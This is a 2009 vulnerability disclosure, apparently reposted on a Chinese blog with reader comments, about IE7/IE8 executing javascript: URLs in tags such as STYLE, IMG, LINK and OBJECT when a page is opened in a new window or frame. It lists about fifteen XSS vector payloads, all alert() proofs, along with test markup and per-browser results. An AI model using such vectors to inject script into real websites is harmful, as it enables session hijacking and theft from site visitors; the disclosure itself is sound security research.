Multiple Exploiting IE8/IE7 XSS Vulnerability

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt

Overview:

Tags[not include <IFRAME>] in ie7/8 are don’t allowe to run “javascript:[jscodz]”,but
we found them allowed ro run where open it in new target.

like this url:

http://www.80vul.com/test/ie8-1.htm

ie8-1.htm’s codz :

<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>

when visite this url by ie7/8, <IFRAME SRC=”javascript:alert(‘XSS6’);”></IFRAME> this is runing, but other aren’t to run.
but, where open ie8-1.htm in new target[like this :<a href= target=”_blank”> and <iframe> and window.open in <sript> … etc.] ,so test this codz in my localhost:

<a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>

[PS: <a href=”http://www.80vul.com/test/ie8-1.htm”>go</a> don’t work]

of couse this codz:

<iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>

and this codz:

<script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>

……..[testing]…….

So the results is :
———————————————————
IE | alert
———————————————————
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
——————————————————
ie8: xss4/xss1/xss11/xss6
———————————————————

Disclosure Timeline:

2009/05/01 – Found this Vulnerability
2009/06/22 – Public Disclosure

Greeting:

ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.

相关日志

楼被抢了 16 层了... 抢座Rss 2.0或者 Trackback

  • ware

    你有转载文章癖吗

    • 鬼仔

      对。

    • kkk

      不觉得鬼仔什么地方做的不对。我觉得他这样做的很好,他将很多有价值的信息分拣整合出来。为什么rss这个网站的人越来越多呢?就是因为他整合的信息很有价值。
      最恨那种自己不愿意脚踏实地去做,又要说三道四的人。鬼仔小弟,我支持你。

      • 流水

        一直很欣赏鬼仔这个地方 对技术的汇集

      • ware

        我觉得用rss,就没法看见作者网站的个性了,

        • 鬼仔

          各有各的好处,rss很方便,我这里rss一直是全文输出,不用打开页面就可以在阅读器中看全文。

      • ware

        主要是eviloctal的转载行为给我留下了强烈的阴影o o

      • ware

        以前一口气连续看好几个blog,一眼看去都是转载的一篇文章,我觉得这很煞笔~~

  • no.86

    英文不好为什么非得用英文写呢。。。一大堆语法错误

  • 回楼上

    装x呗

  • 给老万看的

  • hysia

    也是,可以写成中文让老外自己翻译去。

  • 笨笨

    永远支持你~~加油!

  • ViewOften

    That guy’s poor english really give me a very very deep impression.
    Not his test,not this Vulnerability.——No his test, no this Vulnerability.
    So Chinglish, my god. I suggess that guy use chinese instead, he did a very good job in researching anyway.

发表评论